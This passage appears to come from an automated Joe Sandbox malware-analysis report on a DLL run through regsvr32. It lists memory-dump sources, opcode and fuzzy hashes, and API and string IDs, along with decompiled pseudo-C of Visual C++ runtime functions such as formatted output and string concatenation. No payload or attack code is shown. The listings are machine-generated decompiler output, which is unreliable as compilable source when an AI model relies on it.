                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg$wctomb_s
                                • String ID: ("Incorrect format specifier", 0)$-$9$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2984758162-268265396
                                • Opcode ID: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                • Instruction ID: 3d46b7cc479ec5e1b64121366563b1e191facb976c601abf34f32c88bb47aca1
                                • Opcode Fuzzy Hash: 61945b808d8ddeeab049de188114ad7d55d89a3558f0f9168201042d10a77149
                                • Instruction Fuzzy Hash: 8202ED7260CBC186E7B1CB25E8857AEB7E4F384795F200125EACD86AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                • String ID: "$(pwcs == NULL && sizeInWords == 0) || (pwcs != NULL && sizeInWords > 0)$P$_mbstowcs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$retsize <= sizeInWords
                                • API String ID: 2192614184-660564692
                                • Opcode ID: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                • Instruction ID: 0047506df9643dfb2240c3b63e02d4c6faf0d454733b2a9523d16aca39b446dd
                                • Opcode Fuzzy Hash: 51ea2d8a29ec6a42f4206cddb2a15a761283d0351a467ffd0ee92275139e1829
                                • Instruction Fuzzy Hash: E5E10B32A0DBC685E7B09B14E8457AEA3E0F384794FA04625D6DD53AE8DF7ED484CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E000007FE7FEF9D355F0(void* __ecx, long long __rcx, long long __rdx, signed int* __r8, signed int* __r9, long long _a8, void* _a16, signed int* _a24, signed int* _a32) {
                                				long long _v24;
                                				long long _v32;
                                				long long _v40;
                                				long long _v48;
                                				long long _v56;
                                				void* _v64;
                                				long long _v72;
                                				void* _t88;
                                				void* _t89;
                                				void* _t107;
                                				void* _t109;
                                				signed int* _t158;
                                				signed int* _t160;
                                				long long _t175;
                                				long long _t186;
                                				signed int* _t187;
                                				signed int* _t193;
                                
                                				_a32 = __r9;
                                				_a24 = __r8;
                                				_a16 = __rdx;
                                				_a8 = __rcx;
                                				_v72 = 0;
                                				_t158 = _a24;
                                				if ( *((intOrPtr*)(_t158 + 4)) == 0) goto 0xf9d35639;
                                				_t89 = E000007FE7FEF9D2E680(_t88, _t158);
                                				_v56 = _t158 + _a24[1];
                                				goto 0xf9d35642;
                                				_v56 = 0;
                                				if (_v56 == 0) goto 0xf9d356aa;
                                				_t160 = _a24;
                                				if ( *((intOrPtr*)(_t160 + 4)) == 0) goto 0xf9d35673;
                                				E000007FE7FEF9D2E680(_t89, _t160);
                                				_v48 = _t160 + _a24[1];
                                				goto 0xf9d3567c;
                                				_v48 = 0;
                                				if ( *((char*)(_v48 + 0x10)) == 0) goto 0xf9d356aa;
                                				if (_a24[2] != 0) goto 0xf9d356b1;
                                				if (( *_a24 & 0x80000000) != 0) goto 0xf9d356b1;
                                				goto 0xf9d35966;
                                				if (( *_a24 & 0x80000000) == 0) goto 0xf9d356d0;
                                				_v64 = _a16;
                                				goto 0xf9d356e9;
                                				_v64 = _a24[2] +  *_a16;
                                				if (( *_a24 & 0x00000008) == 0) goto 0xf9d35765;
                                				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d3575b;
                                				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d3575b;
                                				 *_v64 =  *((intOrPtr*)(_a8 + 0x28));
                                				_t175 = _v64;
                                				E000007FE7FEF9D35B30(_t100,  *_t175,  &(_a32[2]));
                                				 *_v64 = _t175;
                                				goto 0xf9d35760;
                                				E000007FE7FEF9D2CF80(_t175);
                                				goto 0xf9d3595a;
                                				if (( *_a32 & 0x00000001) == 0) goto 0xf9d35813;
                                				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35809;
                                				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35809;
                                				_t107 = E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64,  *((intOrPtr*)(_a8 + 0x28)), _a32[5]);
                                				if (_a32[5] != 8) goto 0xf9d35807;
                                				if ( *_v64 == 0) goto 0xf9d35807;
                                				_t186 = _v64;
                                				E000007FE7FEF9D35B30(_t107,  *_t186,  &(_a32[2]));
                                				 *_v64 = _t186;
                                				goto 0xf9d3580e;
                                				_t109 = E000007FE7FEF9D2CF80(_t186);
                                				goto 0xf9d3595a;
                                				_t187 = _a32;
                                				if ( *((intOrPtr*)(_t187 + 0x18)) == 0) goto 0xf9d3583c;
                                				E000007FE7FEF9D2E6A0(_t109, _t187);
                                				_v40 = _t187 + _a32[6];
                                				goto 0xf9d35845;
                                				_v40 = 0;
                                				if (_v40 != 0) goto 0xf9d358c6;
                                				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d358bc;
                                				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d358bc;
                                				_t191 = _a32[5];
                                				_v32 = _a32[5];
                                				E000007FE7FEF9D35B30(_t112,  *((intOrPtr*)(_a8 + 0x28)),  &(_a32[2]));
                                				E000007FE7FEF9D2C410(__ecx, E000007FE7FEF9D3D2C0(1, _v64), _v64, _a32[5], _v32);
                                				goto 0xf9d358c1;
                                				E000007FE7FEF9D2CF80(_t191);
                                				goto 0xf9d3595a;
                                				if (E000007FE7FEF9D3D2C0(1,  *((intOrPtr*)(_a8 + 0x28))) == 0) goto 0xf9d35955;
                                				if (E000007FE7FEF9D3D2C0(1, _v64) == 0) goto 0xf9d35955;
                                				_t193 = _a32;
                                				if ( *((intOrPtr*)(_t193 + 0x18)) == 0) goto 0xf9d35919;
                                				E000007FE7FEF9D2E6A0(_t117, _t193);
                                				_v24 = _t193 + _a32[6];
                                				goto 0xf9d35922;
                                				_v24 = 0;
                                				if (E000007FE7FEF9D3D2F0(_v24) == 0) goto 0xf9d35955;
                                				_t195 = _a32;
                                				if (( *_a32 & 0x00000004) == 0) goto 0xf9d3594b;
                                				_v72 = 2;
                                				goto 0xf9d35953;
                                				_v72 = 1;
                                				goto 0xf9d3595a;
                                				E000007FE7FEF9D2CF80(_a32);
                                				E000007FE7FEF9D2CF50(_t195);
                                				return _v72;
                                			}





















                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                • String ID:
                                • API String ID: 801082872-0
                                • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                • API String ID: 2123368286-1993839260
                                • Opcode ID: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                • Instruction ID: 118e4e4707969e3dac6bf015ec0fe9163e407fa4248f5c8d89799a475a93b5a4
                                • Opcode Fuzzy Hash: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                • Instruction Fuzzy Hash: 49E11B72A1CB86CAE7A08B18E8447AEB3E1F384755F604525E6CD43BB8DB7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                • API String ID: 2123368286-1853640030
                                • Opcode ID: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                • Instruction ID: 2769aadc75a8f45e94697a4dd9f042802452aa73cd8bd2afe7c03a6eee30acd9
                                • Opcode Fuzzy Hash: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                • Instruction Fuzzy Hash: D7E12A32A1DB86CAE7A08B59E8447AEB7E1F385354F604125E6CD43BB8DB7ED444CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                				signed int _t224;
                                				signed char _t229;
                                				void* _t260;
                                				intOrPtr _t268;
                                				signed int _t342;
                                				signed int _t343;
                                				signed long long _t346;
                                				intOrPtr* _t365;
                                				intOrPtr* _t370;
                                				signed long long _t400;
                                
                                				_t342 = __rax;
                                				_a80 = _a80 | 0x00000040;
                                				_a72 = 0xa;
                                				_a72 = 0xa;
                                				_a116 = 0x10;
                                				asm("bts eax, 0xf");
                                				_a1220 = 7;
                                				_a1220 = 0x27;
                                				_a72 = 0x10;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
                                				_a84 = 0x30;
                                				_a86 = _a1220 + 0x51;
                                				_a92 = 2;
                                				_a72 = 8;
                                				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
                                				asm("bts eax, 0x9");
                                				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
                                				E000007FE7FEF9D31EA0( &_a1560);
                                				_a1304 = _t342;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
                                				E000007FE7FEF9D31EA0( &_a1560);
                                				_a1304 = _t342;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
                                				_t343 = E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t343;
                                				goto 0xf9d3e807;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t343;
                                				goto 0xf9d3e844;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t343;
                                				goto 0xf9d3e844;
                                				E000007FE7FEF9D31E40( &_a1560);
                                				_a1304 = _t343;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
                                				if (_a1304 >= 0) goto 0xf9d3e87b;
                                				_a1312 =  ~_a1304;
                                				asm("bts eax, 0x8");
                                				goto 0xf9d3e88b;
                                				_t346 = _a1304;
                                				_a1312 = _t346;
                                				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
                                				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
                                				_a1312 = _a1312 & _t346;
                                				if (_a116 >= 0) goto 0xf9d3e8d1;
                                				_a116 = 1;
                                				goto 0xf9d3e8ee;
                                				_a80 = _a80 & 0xfffffff7;
                                				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
                                				_a116 = 0x200;
                                				if (_a1312 != 0) goto 0xf9d3e901;
                                				_a92 = 0;
                                				_a64 =  &_a687;
                                				_t224 = _a116;
                                				_a116 = _a116 - 1;
                                				if (_t224 > 0) goto 0xf9d3e92f;
                                				if (_a1312 == 0) goto 0xf9d3e9cc;
                                				_a1480 = _a72;
                                				_a1296 = _t224 / _a1480 + 0x30;
                                				_a1488 = _a72;
                                				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
                                				_t229 = _a1296 + _a1220;
                                				_a1296 = _t229;
                                				 *_a64 = _a1296 & 0x000000ff;
                                				_a64 = _a64 - 1;
                                				goto 0xf9d3e90e;
                                				_a104 = _t229;
                                				_a64 = _a64 + 1;
                                				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
                                				if (_a104 == 0) goto 0xf9d3ea0b;
                                				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
                                				_a64 = _a64 - 1;
                                				 *_a64 = 0x30;
                                				_a104 = _a104 + 1;
                                				if (_a108 != 0) goto 0xf9d3ec7c;
                                				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
                                				_a84 = 0x2d;
                                				_a92 = 1;
                                				goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
                                				_a84 = 0x2b;
                                				_a92 = 1;
                                				goto 0xf9d3ea9d;
                                				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
                                				_a84 = 0x20;
                                				_a92 = 1;
                                				_a1320 = _a88 - _a104 - _a92;
                                				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
                                				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
                                				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
                                				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
                                				if (_a76 != 0) goto 0xf9d3ec29;
                                				if (_a104 <= 0) goto 0xf9d3ec29;
                                				_t365 = _a64;
                                				_a1328 = _t365;
                                				_a1336 = _a104;
                                				_a1336 = _a1336 - 1;
                                				if (_a1336 <= 0) goto 0xf9d3ec27;
                                				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
                                				_a1496 = _t365;
                                				E000007FE7FEF9D26840(_t260,  &_a120);
                                				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
                                				if (_a1340 > 0) goto 0xf9d3ebe7;
                                				_a1200 = 0xffffffff;
                                				goto 0xf9d3ec27;
                                				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                				_a1328 = _a1328 + _a1340;
                                				goto 0xf9d3eb61;
                                				goto 0xf9d3ec47;
                                				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                				if (_a1200 < 0) goto 0xf9d3ec7c;
                                				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
                                				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
                                				if (_a96 == 0) goto 0xf9d3ec9c;
                                				0xf9d25330();
                                				_a96 = 0;
                                				goto 0xf9d3da75;
                                				if (_a1216 == 0) goto 0xf9d3ecc2;
                                				if (_a1216 == 7) goto 0xf9d3ecc2;
                                				_a1504 = 0;
                                				goto 0xf9d3eccd;
                                				_a1504 = 1;
                                				_t268 = _a1504;
                                				_a1344 = _t268;
                                				if (_a1344 != 0) goto 0xf9d3ed13;
                                				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                				_a32 = _t370;
                                				r9d = 0;
                                				r8d = 0x8f5;
                                				0xf9d2b3b0();
                                				if (_t268 != 1) goto 0xf9d3ed13;
                                				asm("int3");
                                				if (_a1344 != 0) goto 0xf9d3ed6f;
                                				0xf9d2ab30();
                                				 *_t370 = 0x16;
                                				_a32 = 0;
                                				r9d = 0x8f5;
                                				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                				_a1376 = 0xffffffff;
                                				E000007FE7FEF9D26800( &_a120);
                                				goto 0xf9d3ed8e;
                                				_a1380 = _a1200;
                                				E000007FE7FEF9D26800( &_a120);
                                				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                			}














                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1967237116-1983305044
                                • Opcode ID: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                • Instruction ID: 35e4d6cfc5d3e5722aa157ca10994467d352d975a6b38eaa5eb17889d52142ca
                                • Opcode Fuzzy Hash: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                • Instruction Fuzzy Hash: 7AF1D872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                • API String ID: 2123368286-3477667311
                                • Opcode ID: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                • Instruction ID: c8a25613ed3391733179227ae6d5cd1be8fc2ee2dc7f1a1db629f40b2a14394d
                                • Opcode Fuzzy Hash: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                • Instruction Fuzzy Hash: CAF13832A0DB8685EBE08B19E94476EA3E0F385790F604535D6DE83BA8DF7ED045CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                • API String ID: 2123368286-1420200500
                                • Opcode ID: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                • Instruction ID: 80c7b19323cb8e8402763de004709ed27ed9fdf882d4b7b175d6de3bd1baee6a
                                • Opcode Fuzzy Hash: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                • Instruction Fuzzy Hash: CDF13A32A0CB8A89EBA08B14E84576EA7E0F385795FA04535D6DD43BE8DB7ED044CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2560055391-3497434347
                                • Opcode ID: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                • Instruction ID: 0908f7725f90b5cc69585d97bf8e44ac8e860db6174f4101cd143eaefdb7169b
                                • Opcode Fuzzy Hash: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                • Instruction Fuzzy Hash: 87C11C72A0C7C686E7B1DB64E8457BEB7E4F384785F604025DAC886AA9DB7DE540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                • API String ID: 747159061-1442092225
                                • Opcode ID: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                • Instruction ID: ad53dfe6714ab654120e1b154ee45b7e90274128f767a3acb20d12471acdd345
                                • Opcode Fuzzy Hash: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                • Instruction Fuzzy Hash: AE617C72A1C646CAE7909B25EC4076E72E1F780765F604725E6ED47AF9DB3EE440CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1778837556-2487400587
                                • Opcode ID: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                • Instruction ID: a9706cbd1d0bc1ca6f0e01aa99e4221a5492a8f84fcd1c14ee91e7fca0fd8dc0
                                • Opcode Fuzzy Hash: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                • Instruction Fuzzy Hash: 5351D376608BC191E774DB18E8803EEB3E1F788384F604126EACD43AA9DB7ED154CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmp
